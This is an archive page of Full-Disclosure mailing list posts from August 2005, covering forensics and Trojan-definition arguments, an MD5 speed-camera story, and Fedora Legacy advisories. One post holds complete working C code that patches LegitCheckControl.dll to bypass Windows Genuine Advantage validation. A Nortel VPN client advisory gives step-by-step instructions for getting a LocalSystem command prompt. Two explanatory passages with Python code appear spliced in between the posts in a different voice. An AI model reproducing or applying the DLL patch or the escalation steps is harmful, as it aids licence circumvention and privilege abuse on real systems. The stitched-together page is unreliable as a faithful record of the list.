Re: [Full-disclosure] Help put a stop to incompetent computerforensics

2005-08-10 Thread Greg

- Original Message - 
From: <[EMAIL PROTECTED]>
To: 
Sent: Wednesday, August 10, 2005 10:50 PM
Subject: Re: [Full-disclosure] Help put a stop to incompetent computerforensics


> Quoting Jason Coombs <[EMAIL PROTECTED]>:
> 
>> Somehow we need to fix this broken system and insist that all 
>> computer forensics be performed with the help of a competent 
>> information security professional, at the very least.
>>
>> Any other suggestions?
> 
> Maybe we should start a certification program.  And we'll charge $5000 
> a year to be certified so only serious players will get certified.  And 
> we'll have roving "seminars" in all major cities taught only by our 
> certified instructors.  Yeah, that's it.  And we'll rig the test so 
> people have to take our useless classes to pass our useless tests.  
> Then we'll dump press releases on every ZD rag out there and maybe pay 
> a few CIOs and industry shills to comment on how, "hiring a 'certified 
> computer corpse analyst' is the only way to determine competency".
> 
> Yeah.  That'll fix it.  tc
> 

What bothers me the most is that a lot of what I know - and I don't claim to 
know as much as most people here - isn't available as a "text" anywhere. You 
are interested enough, you work it out for yourself.

So, yeah, I could charge someone $5000 to be taught by me that which I know. 
However, compared to some it isn't worth $5000 while to others it is priceless.

Pick your target. An incompetent investigator is one who doesn't care, not a 
newbie. A newbie is potentially incompetent and potentially the best thing ever 
to happen to this trade.

Don't stamp out newbies in the rush to stamp out knowledgeable lazy sods.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Motorist wins case after maths whizzes break speed camera code (fwd)

2005-08-10 Thread J.A. Terranson


-- Forwarded message --
Date: Wed, 10 Aug 2005 14:29:38 -0400
From: [EMAIL PROTECTED]
To: cryptography@metzdowd.com
Subject: Motorist wins case after maths whizzes break speed camera code

The facts are very scrambled but I like it.
The brief TV reports from lawyers were more factual.

Motorist wins case after maths whizzes break speed camera code

Sydney Morning Herald
By Andrew Clark
August 11, 2005

A team of Chinese maths enthusiasts have thrown NSW's speed cameras
system into disarray by cracking the technology used to store data
about errant motorists.

The NRMA has called for a full audit of the way the state's 110
enforcement cameras are used after a motorist escaped a conviction by
claiming that data was vulnerable to hackers.

A Sydney magistrate, Laurence Lawson, threw out the case because the
Roads and Traffic Authority failed to find an expert to testify that
its speed camera images were secure.

The motorist's defence lawyer, Denis Mirabilis, argued successfully
that an algorithm known as MD5, which is used to store the time, date,
place, numberplate and speed of cars caught on camera, was a
discredited piece of technology.

Mr Mirabilis yesterday said he had received more than 100 inquiries
from motorists anxious to use the same defence. "People have shown it
[the algorithm] has been hacked and it's open to viruses."

Designed in the early 1990s by an American academic, MD5 safeguards
against tampering by turning information into a 128-bit sequence of
digits. However, researchers from China's Shandong University have
proved it is possible to store conflicting pieces of information as
the same MD5 sequence.

Nick Ellsmore, an encryption expert at the consultancy SIFT, said this
theoretically meant the RTA could change the speed at which a car was
recorded and retain the same code.

"Since the research came out, we've been recommending that clients
move away from MD5 and we've certainly recommended that people don't
use it for new applications," he said.

The NRMA said it was crucial the public had confidence in convictions.
Its policy specialist, Lisa McGill, said: "We want a full audit and a
review of the system to ensure that it is working appropriately."

The RTA's spokesman, Paul Willoughby, rejected the decision as a
one-off: "No one, in relation to court cases, can be a hundred per
cent sure they're going to win a hundred per cent of the time."

NSW's weekly take from the cameras is more than $1 million.

Meanwhile, the RTA denied reports that cameras catching toll evaders
in the Harbour Tunnel are routinely turned off.

-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
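The forwarded article runs two different things together, and it is worth separating them before the "MD5 is discredited" defence gets reused. The Shandong result is a collision attack: it produces two attacker-built messages with the same MD5 digest. It does not let anyone find a second message matching the digest of an existing record. Against an insider who can rewrite a stored record, no collision is needed at all: an unkeyed hash kept beside the record is simply recomputed. What changes that picture is a keyed tag (or a signature) whose key the record-holder does not have. The block below is an added example, not code from the article, the RTA, or the researchers it names; the record layout, values and key are constructed for the demo.

```python
"""Added example: why a bare hash beside an evidence record is not a tamper
seal, and what a keyed seal (HMAC-SHA256) changes.

Record layout, values and KEY are constructed for the demo; a real deployment
would keep the key in an HSM or sign the record, never store the key with it."""
import hashlib
import hmac

KEY = b"constructed-demo-key"

SAMPLE = {  # constructed record, not an RTA format
    "time": "2005-08-01T14:29:38",
    "place": "M4 westbound, km 12",
    "plate": "ABC123",
    "speed_kmh": 117,
}


def canonical(record):
    """Stable byte encoding so the sealer and the verifier hash identical bytes."""
    return "|".join(f"{k}={record[k]}" for k in sorted(record)).encode()


def md5_seal(record):
    """Unkeyed digest, as the article describes the camera data being stored."""
    return hashlib.md5(canonical(record)).hexdigest()


def hmac_seal(record, key=KEY):
    """Keyed tag: only a holder of `key` can produce a valid one."""
    return hmac.new(key, canonical(record), hashlib.sha256).hexdigest()


def md5_seal_holds(record, seal):
    return hmac.compare_digest(md5_seal(record), seal)


def hmac_seal_holds(record, seal, key=KEY):
    return hmac.compare_digest(hmac_seal(record, key), seal)


def insider_edit_with_md5(record, new_speed):
    """Whoever can write the record can recompute an unkeyed hash. No collision
    search is involved: the 'seal' stays valid after the speed is changed."""
    forged = {**record, "speed_kmh": new_speed}
    return forged, md5_seal(forged)


def insider_edit_without_key(record, original_seal, new_speed):
    """Same edit against a keyed seal: without KEY the old tag no longer matches
    and a new one cannot be computed. Returns whether the old seal still holds."""
    forged = {**record, "speed_kmh": new_speed}
    return hmac_seal_holds(forged, original_seal)


if __name__ == "__main__":
    forged, seal = insider_edit_with_md5(SAMPLE, 95)
    print("MD5 seal still valid after edit:", md5_seal_holds(forged, seal))
    print("HMAC seal still valid after edit:",
          insider_edit_without_key(SAMPLE, hmac_seal(SAMPLE), 95))
```

The keyed tag does not make the record trustworthy on its own: the party holding the key (here, the operator) can still re-seal whatever it likes. It moves the question from "is the algorithm collision-resistant" to "who holds the key and where is it logged", which is the question a court-facing audit should actually be asking.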


[Full-disclosure] WGA patch for LegitCheckControl.dll

2005-08-10 Thread M. Mohr
I'm not sure this got through the first time, so I'll resend
it.  Sorry if there is a dupe.

/*
  Name: Windows Genuine Advantage Validation Patch
  Copyright: NeoSecurityTeam
  Author: HaCkZaTaN <[EMAIL PROTECTED]>
  Date: 31/07/05 21:42
  Description: LegitCheckControl.dll (1.3.254.0)

  [N]eo [S]ecurity [T]eam [NST]® - http://www.neosecurityteam.net/
  Irc.GigaChat.Net #uruguay

  

  Code cleanup and input validation by Arashi
  Original code from:

http://dkcs.void.ru/index.php?module=exploits&FullArticle=exploits/380

*/

#include <stdio.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>

/* Windows C runtimes translate line endings on text-mode descriptors, which
   would corrupt both the verification reads and the written bytes, so the
   file must be opened with O_BINARY there. POSIX has no such flag. */
#ifndef O_BINARY
#define O_BINARY 0
#endif

typedef struct bytepair BYTEPAIR;

struct bytepair
{
  long offset;          /* file offset of the byte to patch */
  unsigned char old;    /* expected original byte, checked before writing */
  unsigned char new;    /* replacement byte */
};

/* 8B 45 D8 (mov eax,[ebp-28h]) becomes 33 C0 90 (xor eax,eax / nop). */
static const BYTEPAIR byte_pairs[3]= {
  {0x2BE98, 0x8B, 0x33},
  {0x2BE99, 0x45, 0xC0},
  {0x2BE9A, 0xD8, 0x90},
};

int main(void) {
  unsigned short i;
  int LegitCheckControl;
  unsigned char check, ver[10];

  printf("\n\n\n\nLegitCheckControl.dll 1.3.254.0 WGA validation patch.\n\n"
         "Code cleanup and validation by Arashi\n"
         "Author: HaCkZaTaN <[EMAIL PROTECTED]>\n"
         "®[N]eo [S]ecurity [T]eam [NST]\n"
         "  - http://www.neosecurityteam.net/\n"
         "  - Irc.GigaChat.Net #uruguay\n\n"
         "-\n\n");

  printf("Verifying LegitCheckControl.dll...\n");

  LegitCheckControl = open("LegitCheckControl.dll", O_RDWR | O_BINARY);

  if (LegitCheckControl == -1) {
    perror("LegitCheckControl.dll");
    return 1;
  }
  else printf("  * LegitCheckControl.dll opened successfully.\n");

  /* The version string is expected at a fixed offset in this build. */
  if (lseek(LegitCheckControl, 0xD2A0, SEEK_SET) == -1) {
    perror("  ! lseek");
    return 1;
  }
  if (read(LegitCheckControl, ver, 10) != 10) {
    perror("  ! read");
    return 1;
  }
  if (strncmp((const char *)ver, "1.3.0254.0", 10)) {
    fprintf(stderr, "  ! Invalid version information\n\nAborted.\n");
    return 1;
  }
  else printf("  * Version information is confirmed.\n");

  /* Check every target byte before writing anything, so a different build
     or an already-patched file is left untouched. */
  for(i=0;i<3;i++) {
    if (lseek(LegitCheckControl, byte_pairs[i].offset, SEEK_SET) == -1) {
      perror("  ! lseek");
      return 1;
    }
    if (read(LegitCheckControl, &check, 1) != 1) {
      perror("  ! read");
      return 1;
    }

    if (check != byte_pairs[i].old) {
      fprintf(stderr, "  ! Unable to verify patch bytes.\n\nAborted.\n");
      return 1;
    }
  }

  printf("  * LegitCheckControl.dll validated.\n\nApplying patch...\n");

  for(i=0;i<3;i++) {
    if (lseek(LegitCheckControl, byte_pairs[i].offset, SEEK_SET) == -1) {
      perror("  ! lseek");
      return 1;
    }
    if (write(LegitCheckControl, &byte_pairs[i].new, 1) != 1) {
      perror("  ! write");
      return 1;
    }
  }

  close(LegitCheckControl);

  printf("Patch complete.\n\n\n");

  return 0;
}





___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


RE: [Full-disclosure] Re: Help put a stop to incompetent computer forensics

2005-08-10 Thread Richard Golodner
Everyone wrote all of this below but Trojan, and/or Backdoor, basically
still means pain in the ass!
RG

-Original Message-
From: Chuck Fullerton [mailto:[EMAIL PROTECTED] 
Sent: Wednesday, August 10, 2005 10:07 PM
To: [EMAIL PROTECTED]; 'James Tucker'
Cc: 'Full-Disclosure'
Subject: RE: [Full-disclosure] Re: Help put a stop to incompetent
computerforensics

Ok.. In one reply you typed...

"In computers, a Trojan horse is a program in which malicious or harmful
code is contained inside apparently harmless programming or data in such a
way that it can get control and do its chosen form of damage, such as
ruining the file allocation table on your hard disk."

Below you said...

"This is part of why I'm saying that the definition of Trojan must include
the access and control that a backdoor gives."

In your reply to me earlier (First example above), The trojan can do its
damage without giving control to an outside attacker.  That's the difference
between the two.  A backdoor gives access to an outside attacker while a
Trojan doesn't.  It can however use a backdoor combined with the trojan to
deliver access.

Chuck Fullerton


-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Jason Coombs
Sent: Wednesday, August 10, 2005 9:34 PM
To: James Tucker
Cc: Full-Disclosure
Subject: Re: [Full-disclosure] Re: Help put a stop to incompetent
computerforensics

James Tucker wrote:
> Sorry, how many programs which you class as "Trojans" add what you 
> define as a "backdoor", given that a "backdoor" is generally 
> pre-compiled code which allows access via previously un-announced or 
> commonly unused connection methods? Malware doesn't typically ADD 
> backdoors, it comes shipped with them, thus the classification 
> Trojan.Backdoor, as opposed to just Trojan. Many of the more common 
> Trojans these days are Worms, Trojans, and Backdoors and some are Viri 
> too. The reason is simple - short of breaking the kernel process 
> scheduler it is useful to be a Trojan when present as an active virus.
> Similarly due to the current nature of desktop and server side 
> application logic, most viri are unsuccessful without being worms - 
> although this may change in a few decades as applications become more 
> data driven and automatic. Nothing will ever substitute a full 
> description of a particular malware's actions in describing what it 
> does, unless you expect malware authors to start conforming to 
> standards.


Applying the broader definition of Trojan, I can't even make sense out of
your paragraph above. But I know that you aren't using the term to
communicate the idea of malware that enables the attacker to gain control
over, and future access to, the infected system ... If that's the definition
you had in mind, then the paragraph you wrote makes logical sense.
Otherwise, not.

I agree that calling it a backdoor isn't comfortable, it just doesn't fit.
This is part of why I'm saying that the definition of Trojan must include
the access and control that a backdoor gives.

It doesn't make sense to me that "Many of the more common Trojans these days
are Worms, Trojans, and Backdoors ..." unless you are using Trojan to
communicate the feature of remote access to the infected box.

Sincerely,

Jason Coombs
[EMAIL PROTECTED]
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/



RE: [Full-disclosure] Re: Help put a stop to incompetent computerforensics

2005-08-10 Thread Chuck Fullerton
Ok.. In one reply you typed...

"In computers, a Trojan horse is a program in which malicious or harmful
code is contained inside apparently harmless programming or data in such a
way that it can get control and do its chosen form of damage, such as
ruining the file allocation table on your hard disk."

Below you said...

"This is part of why I'm saying that the definition of Trojan must include
the access and control that a backdoor gives."

In your reply to me earlier (First example above), The trojan can do its
damage without giving control to an outside attacker.  That's the difference
between the two.  A backdoor gives access to an outside attacker while a
Trojan doesn't.  It can however use a backdoor combined with the trojan to
deliver access.

Chuck Fullerton


-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Jason Coombs
Sent: Wednesday, August 10, 2005 9:34 PM
To: James Tucker
Cc: Full-Disclosure
Subject: Re: [Full-disclosure] Re: Help put a stop to incompetent
computerforensics

James Tucker wrote:
> Sorry, how many programs which you class as "Trojans" add what you 
> define as a "backdoor", given that a "backdoor" is generally 
> pre-compiled code which allows access via previously un-announced or 
> commonly unused connection methods? Malware doesn't typically ADD 
> backdoors, it comes shipped with them, thus the classification 
> Trojan.Backdoor, as opposed to just Trojan. Many of the more common 
> Trojans these days are Worms, Trojans, and Backdoors and some are Viri 
> too. The reason is simple - short of breaking the kernel process 
> scheduler it is useful to be a Trojan when present as an active virus.
> Similarly due to the current nature of desktop and server side 
> application logic, most viri are unsuccessful without being worms - 
> although this may change in a few decades as applications become more 
> data driven and automatic. Nothing will ever substitute a full 
> description of a particular malware's actions in describing what it 
> does, unless you expect malware authors to start conforming to 
> standards.


Applying the broader definition of Trojan, I can't even make sense out of
your paragraph above. But I know that you aren't using the term to
communicate the idea of malware that enables the attacker to gain control
over, and future access to, the infected system ... If that's the definition
you had in mind, then the paragraph you wrote makes logical sense.
Otherwise, not.

I agree that calling it a backdoor isn't comfortable, it just doesn't fit.
This is part of why I'm saying that the definition of Trojan must include
the access and control that a backdoor gives.

It doesn't make sense to me that "Many of the more common Trojans these days
are Worms, Trojans, and Backdoors ..." unless you are using Trojan to
communicate the feature of remote access to the infected box.

Sincerely,

Jason Coombs
[EMAIL PROTECTED]
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/



[Full-disclosure] Privilege escalation in Nortel Contivity VPN Client V05_01.030

2005-08-10 Thread Jeff Peadro
Summary:
Privilege escalation in Nortel Contivity VPN Client V05_01.030
(http://www.nortel.com)

Details:
The Contivity VPN Client is a Windows application that lets you define
and store connection information for accessing your corporate network
through a Contivity Secure IP Services Gateway.  When the Contivity
client is running as a service it is possible to manipulate the
interface of the client and escalate privileges to that of the
LocalSystem account.

Vulnerable Versions:
Nortel Contivity VPN Client V05_01.030

Patches/Workarounds:
The vendor was notified of the issue and an updated version has been released.

Exploit:

1. With the Contivity client open click on Options and select
Authentication Options.

2. Select Digital Certificate Authentication Entrust and click OK.

3. To the right of the certificate box click the button icon and select Open.

4. Change Files of type: to All Files, navigate to the system32
directory and locate cmd.exe. Right click cmd.exe and choose Open.

It should also be noted that this exploit can be carried out by
running the connection wizard and following steps 2-4.

The result is a command prompt running under the context of the
LocalSystem account: the Open dialog is drawn by the service process
itself, so cmd.exe launched from it inherits that process's token.

Discovered by Jeff Peadro Jeff.Peadro[at]gmail[dot]com
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Re: Help put a stop to incompetent computer forensics

2005-08-10 Thread Jason Coombs

James Tucker wrote:

> Sorry, how many programs which you class as "Trojans" add what you
> define as a "backdoor", given that a "backdoor" is generally
> pre-compiled code which allows access via previously un-announced or
> commonly unused connection methods? Malware doesn't typically ADD
> backdoors, it comes shipped with them, thus the classification
> Trojan.Backdoor, as opposed to just Trojan. Many of the more common
> Trojans these days are Worms, Trojans, and Backdoors and some are Viri
> too. The reason is simple - short of breaking the kernel process
> scheduler it is useful to be a Trojan when present as an active virus.
> Similarly due to the current nature of desktop and server side
> application logic, most viri are unsuccessful without being worms -
> although this may change in a few decades as applications become more
> data driven and automatic. Nothing will ever substitute a full
> description of a particular malware's actions in describing what it
> does, unless you expect malware authors to start conforming to
> standards.



Applying the broader definition of Trojan, I can't even make sense out 
of your paragraph above. But I know that you aren't using the term to 
communicate the idea of malware that enables the attacker to gain 
control over, and future access to, the infected system ... If that's 
the definition you had in mind, then the paragraph you wrote makes 
logical sense. Otherwise, not.


I agree that calling it a backdoor isn't comfortable, it just doesn't 
fit. This is part of why I'm saying that the definition of Trojan must 
include the access and control that a backdoor gives.


It doesn't make sense to me that "Many of the more common Trojans these 
days are Worms, Trojans, and Backdoors ..." unless you are using Trojan 
to communicate the feature of remote access to the infected box.


Sincerely,

Jason Coombs
[EMAIL PROTECTED]
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Re: Help put a stop to incompetent computerforensics

2005-08-10 Thread Jason Coombs

Chuck Fullerton wrote:

> "A Trojan horse is a program that appears to have some useful or benign
> purpose, but really masks some hidden malicious functionality."
>
> "A Backdoor is a program that allows attackers to bypass normal security
> controls on a system, gaining access on the attacker's own terms."


Here's an example of a completely flawed explanation of the origin of 
the term. The definition given claims that the warriors emerged from the 
horse and only those warriors overran the city. Obviously that isn't 
what happened in the Iliad, the Trojan Horse was used to get further 
access for other warriors. Furthermore, "overran the city" means of 
course that the Trojan Horse was used for the purpose of gaining control 
of the city, regardless of which warriors accomplished the objective.


Most (but not all) of you are suggesting that the only thing that 
matters is what the definitions say, and that's not the right way to 
look at this issue. A program that does something malicious when used is 
not a Trojan unless its malicious purpose fits with the story of the 
Trojan Horse as it is understood by non-computer people. This is why we 
don't call spyware Trojans any longer -- a distinction has been drawn, 
and that distinction has overrun the past usage of the term.


http://searchsecurity.techtarget.com/sDefinition/0,,sid14_gci213221,00.html

In computers, a Trojan horse is a program in which malicious or harmful 
code is contained inside apparently harmless programming or data in such 
a way that it can get control and do its chosen form of damage, such as 
ruining the file allocation table on your hard disk. In one celebrated 
case, a Trojan horse was a program that was supposed to find and destroy 
computer viruses. A Trojan horse may be widely redistributed as part of 
a computer virus.


The term comes from Greek mythology about the Trojan War, as told in the 
Aeneid by Virgil and mentioned in the Odyssey by Homer. According to 
legend, the Greeks presented the citizens of Troy with a large wooden 
horse in which they had secretly hidden their warriors. During the 
night, the warriors emerged from the wooden horse and overran the city.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


RE: [Full-disclosure] Re: Help put a stop to incompetent computerforensics

2005-08-10 Thread Chuck Fullerton
To Quote Ed Skoudis' "Malware: Fighting Malicious Code"

"A Trojan horse is a program that appears to have some useful or benign
purpose, but really masks some hidden malicious functionality."

"A Backdoor is a program that allows attackers to bypass normal security
controls on a system, gaining access on the attacker's own terms." 

What this means is that many times they are found together but a Trojan is
not necessarily a backdoor and a backdoor is not necessarily a trojan.

In the case Jason was saying the Trojan was forcing the use of the Backdoor.

Does this clear it up at all?

Chuck Fullerton
CEH, OPST, CISSP

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Jason Coombs
Sent: Wednesday, August 10, 2005 8:59 PM
To: Donald J. Ankney
Cc: Full-Disclosure
Subject: Re: [Full-disclosure] Re: Help put a stop to incompetent
computerforensics

Donald J. Ankney wrote:
> Your definition is just a subset of the standard, broader one. 

When a word causes widespread misunderstanding such that you simply can't
use it to communicate ideas clearly, the old meaning becomes archaic. I
think that's what has happened with Trojan. Proof of this can be found in
the list of malware that anti-Trojan software is designed to detect --
without double-checking this, just from memory, I'm going to say that the
list of malware detected by the typical anti-Trojan software product is
limited to malware that meets my definition and does not include the broader
definition. That causes a real problem, in practice, since if the
anti-Trojan doesn't stop spyware then how can spyware be a Trojan?

Regards,

Jason Coombs
[EMAIL PROTECTED]
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/



Re: [Full-disclosure] Re: Help put a stop to incompetent computer fore nsics

2005-08-10 Thread Fergie (Paul Ferguson)
*plonk*

--filtered--


[snip]

Jason Coombs
[EMAIL PROTECTED]

[snip]


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Re: Help put a stop to incompetent computer forensics

2005-08-10 Thread Jason Coombs

Donald J. Ankney wrote:
> Your definition is just a subset of the standard, broader one.


When a word causes widespread misunderstanding such that you simply 
can't use it to communicate ideas clearly, the old meaning becomes 
archaic. I think that's what has happened with Trojan. Proof of this can 
be found in the list of malware that anti-Trojan software is designed to 
detect -- without double-checking this, just from memory, I'm going to 
say that the list of malware detected by the typical anti-Trojan 
software product is limited to malware that meets my definition and does 
not include the broader definition. That causes a real problem, in 
practice, since if the anti-Trojan doesn't stop spyware then how can 
spyware be a Trojan?


Regards,

Jason Coombs
[EMAIL PROTECTED]
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Re: Help put a stop to incompetent computer forensics

2005-08-10 Thread Jason Coombs

Thierry Zoller wrote:

> JC> Because Trojan horses often have
> JC> these harmful functions, there often arises the misunderstanding that
> ^
> JC> such functions define a Trojan Horse.
>
> Please read what you just posted, it directly contradicts what
> that wikipedia author wrote 2 lines above that. That wikipedia
> article can be trashed.


It is not a misunderstanding. The definition of Trojan has very clearly 
been relegated to the malware that forces open a means of unauthorized 
or hidden access or remote control, i.e. a backdoor. I understand your 
point that Trojan had a broader definition in the past, but that is in 
the past. Archaic. The Wikipedia entry is instructive to illustrate that 
there is so often a "misunderstanding" in present usage that the older 
definition is no longer correct.


We won't succeed in attempts to convince millions of people that a 
Trojan Horse is also a gift that contains a nuclear bomb inside that 
will nuke your house after you accept it. That's not a Trojan, that's a 
bomb, even if it is a Greek wooden horse. It just doesn't matter that in 
the past the industry had not yet come to realize that it needed a 
different term for spyware. We have it now, so there's no looking back.


Thanks for helping me understand your viewpoint. I've never met anyone 
who thinks of a Trojan the way that you do, and the common usage even by 
infosec industry professionals clouded my brain so badly that at no time 
did I perceive the classic definitions you and others have cited to 
imply anything other than the context in which the term is used today. 
The bad acts that the Trojan performs, in my mind, must be in connection 
with some attempt to give the Trojan author further, future access to 
systems or to the data they contain.


I'm not saying that you're wrong. I'm saying you have far too much 
experience and expertise, and all that knowledge is causing you to fail 
to see the forest for the trees. Common people's common sense has 
changed the definition of Trojan, pure and simple.


Nobody today would avoid using the term spyware just because the term 
Trojan was the way in which that malware would have been labeled in the 
past. As I said, everyone I know understands what a Trojan is, and their 
understanding is not what you suggest it should be.


Sincerely,

Jason Coombs
[EMAIL PROTECTED]
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] [FLSA-2005:129284] Updated spamassassin package fixes security issue

2005-08-10 Thread Marc Deslauriers
-
   Fedora Legacy Update Advisory

Synopsis:  Updated spamassassin package fixes security issue
Advisory ID:   FLSA:129284
Issue date:    2005-08-10
Product:   Fedora Core
Keywords:  Bugfix
CVE Names: CAN-2004-0796
-


-
1. Topic:

An updated spamassassin package that fixes a denial of service bug when
parsing malformed messages is now available.

SpamAssassin provides a way to reduce unsolicited commercial email
(SPAM) from incoming email.

2. Relevant releases/architectures:

Fedora Core 2 - i386

3. Problem description:

A denial of service bug has been found in SpamAssassin versions below
2.64. A malicious attacker could construct a message in such a way that
would cause spamassassin to stop responding, potentially preventing the
delivery or filtering of email. The Common Vulnerabilities and Exposures
project (cve.mitre.org) has assigned the name CAN-2004-0796 to this
issue.

Users of SpamAssassin should update to these updated packages, which
contain an updated version and are not vulnerable to this issue.

4. Solution:

Before applying this update, make sure all previously released errata
relevant to your system have been applied.

To update all RPMs for your particular architecture, run:

rpm -Fvh [filenames]

where [filenames] is a list of the RPMs you wish to upgrade.  Only those
RPMs which are currently installed will be updated.  Those RPMs which
are not installed but included in the list will not be updated.  Note
that you can also use wildcards (*.rpm) if your current directory *only*
contains the desired RPMs.

Please note that this update is also available via yum and apt.  Many
people find this an easier way to apply updates.  To use yum issue:

yum update

or to use apt:

apt-get update; apt-get upgrade

This will start an interactive process that will result in the
appropriate RPMs being upgraded on your system.  This assumes that you
have yum or apt-get configured for obtaining Fedora Legacy content.
Please visit http://www.fedoralegacy.org/docs for directions on how to
configure yum and apt-get.

5. Bug IDs fixed:

https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=129284

6. RPMs required:

Fedora Core 2:

SRPM:
http://download.fedoralegacy.org/fedora/2/updates/SRPMS/spamassassin-2.64-2.1.legacy.src.rpm

i386:
http://download.fedoralegacy.org/fedora/2/updates/i386/spamassassin-2.64-2.1.legacy.i386.rpm


7. Verification:

SHA1 sum Package Name
-

6b7fbf447dce761c6dc6c85df6cc336cb31a939a
fedora/2/updates/i386/spamassassin-2.64-2.1.legacy.i386.rpm
8808655655b574f905a0308f0a0eca0c5e7d09c8
fedora/2/updates/SRPMS/spamassassin-2.64-2.1.legacy.src.rpm

These packages are GPG signed by Fedora Legacy for security.  Our key is
available from http://www.fedoralegacy.org/about/security.php

You can verify each package with the following command:

rpm --checksig -v [filename]

If you only wish to verify that each package has not been corrupted or
tampered with, examine only the sha1sum with the following command:

sha1sum [filename]

8. References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0796

9. Contact:

The Fedora Legacy security contact is <[EMAIL PROTECTED]>. More
project details at http://www.fedoralegacy.org

-


signature.asc
Description: OpenPGP digital signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
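Section 7 of the advisory gives a digest table and two ways to check it. As an added example, not part of the advisory or Fedora Legacy's own tooling, the block below parses that "SHA1 sum Package Name" table (including the wrapped layout mailed advisories end up with, digest on one line and path on the next), hashes the downloaded files and reports per package. The caveat the advisory itself makes still applies: a matching sha1sum shows the file is the one the advisory text describes, and nothing more; if the mirror and the advisory copy could both be forged, only the GPG signature checked by rpm --checksig establishes authenticity. The file contents and digests below are constructed for the demo; the package names are reused from the advisory only as realistic input.

```python
"""Added example: verify downloaded RPMs against an advisory's SHA1 table.

File contents, the 'tampered' and 'missing' cases, and every digest in the
demo table are constructed; they are not the advisory's real sums."""
import hashlib
import hmac
import os
import re
import tempfile

HEX40 = re.compile(r"^[0-9a-f]{40}$")
ONE_LINE = re.compile(r"^([0-9a-f]{40})\s+(\S+)$")


def parse_sum_table(text):
    """Return {package path: sha1 hex}.

    Accepts 'digest<ws>path' on one line and the wrapped layout where the
    digest stands alone and the path follows on the next line. The
    'SHA1 sum Package Name' header and dash rulers are skipped."""
    sums = {}
    pending = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("-") or line.lower().startswith("sha1 sum"):
            continue
        m = ONE_LINE.match(line)
        if m:
            sums[m.group(2)] = m.group(1)
            pending = None
        elif HEX40.match(line):
            pending = line
        elif pending:
            sums[line] = pending
            pending = None
    return sums


def sha1_of_file(path):
    """Stream the file so large RPMs are not read into memory at once."""
    h = hashlib.sha1()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def verify_downloads(sums, download_dir):
    """Map each package path from the table to 'ok', 'MISMATCH' or 'missing'.
    Files are looked up by basename, as rpm -Fvh would see them."""
    results = {}
    for pkg, expected in sums.items():
        path = os.path.join(download_dir, os.path.basename(pkg))
        if not os.path.isfile(path):
            results[pkg] = "missing"
        elif hmac.compare_digest(sha1_of_file(path), expected):
            results[pkg] = "ok"
        else:
            results[pkg] = "MISMATCH"
    return results


def demo():
    """Constructed download directory plus a table in the wrapped layout:
    one intact package, one modified after its sum was published, one never
    fetched. Returns the verification results."""
    with tempfile.TemporaryDirectory() as d:
        good = os.path.join(d, "spamassassin-2.64-2.1.legacy.i386.rpm")
        bad = os.path.join(d, "spamassassin-2.64-2.1.legacy.src.rpm")
        with open(good, "wb") as f:
            f.write(b"constructed binary package contents\n")
        with open(bad, "wb") as f:
            f.write(b"constructed source package, altered after publication\n")
        table = (
            "SHA1 sum Package Name\n"
            "-\n"
            f"{sha1_of_file(good)}\n"
            "fedora/2/updates/i386/spamassassin-2.64-2.1.legacy.i386.rpm\n"
            "0000000000000000000000000000000000000000\n"
            "fedora/2/updates/SRPMS/spamassassin-2.64-2.1.legacy.src.rpm\n"
            "1111111111111111111111111111111111111111 "
            "fedora/2/updates/i386/not-downloaded.rpm\n"
        )
        return verify_downloads(parse_sum_table(table), d)


if __name__ == "__main__":
    for pkg, status in demo().items():
        print(f"{status:9} {pkg}")
```

Run it against a real download by pasting the advisory's table into parse_sum_table and pointing verify_downloads at the directory the RPMs were fetched into; a MISMATCH is a reason to stop and re-fetch, not to install, and an "ok" is still followed by rpm --checksig before rpm -Fvh.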

[Full-disclosure] [FLSA-2005:152889] Updated mc packages fix security issues

2005-08-10 Thread Marc Deslauriers
-
   Fedora Legacy Update Advisory

Synopsis:  Updated mc packages fix security issues
Advisory ID:   FLSA:152889
Issue date:    2005-08-10
Product:   Red Hat Linux, Fedora Core
Keywords:  Bugfix
